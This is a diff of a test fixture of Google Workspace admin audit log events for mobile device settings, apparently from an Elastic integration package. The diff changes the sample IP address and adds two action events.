-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_CERTIFICATE_COMMON_NAME","value":"name"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_DEVICES_BULK_CREATION","parameters":[{"name":"NUMBER_OF_COMPANY_OWNED_DEVICES","intValue":10}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_BLOCKED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_DEVICE_DELETION","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_UNBLOCKED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_WIPED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT","parameters":[{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"GROUP"},{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"NEW_PERMISSION_GRANT_STATE","value":"GRANTED"},{"name":"OLD_PERMISSION_GRANT_STATE","value":"DENIED"},{"name":"PERMISSION_GROUP_NAME","value":"LOCATION"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_SETTINGS","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_APPLICATION_TO_WHITELIST","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_APPROVE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_BLOCK","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_DELETE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_WIPE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_ADMIN_RESTRICTIONS_PIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_CERTIFICATE_COMMON_NAME","value":"cert"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_ACCOUNT_WIPE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ACTION_CANCELLED","parameters":[{"name":"ACTION_ID","value":"id"},{"name":"ACTION_TYPE","value":"ACCOUNT_WIPE"},{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ACTION_REQUESTED","parameters":[{"name":"ACTION_ID","value":"id"},{"name":"ACTION_TYPE","value":"ACCOUNT_WIPE"},{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_CERTIFICATE_COMMON_NAME","value":"name"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_DEVICES_BULK_CREATION","parameters":[{"name":"NUMBER_OF_COMPANY_OWNED_DEVICES","intValue":10}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_BLOCKED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_DEVICE_DELETION","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_UNBLOCKED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_WIPED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT","parameters":[{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"GROUP"},{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"NEW_PERMISSION_GRANT_STATE","value":"GRANTED"},{"name":"OLD_PERMISSION_GRANT_STATE","value":"DENIED"},{"name":"PERMISSION_GROUP_NAME","value":"LOCATION"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_SETTINGS","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_APPLICATION_TO_WHITELIST","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_APPROVE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_BLOCK","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_DELETE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_WIPE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_ADMIN_RESTRICTIONS_PIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_CERTIFICATE_COMMON_NAME","value":"cert"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_ACCOUNT_WIPE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} 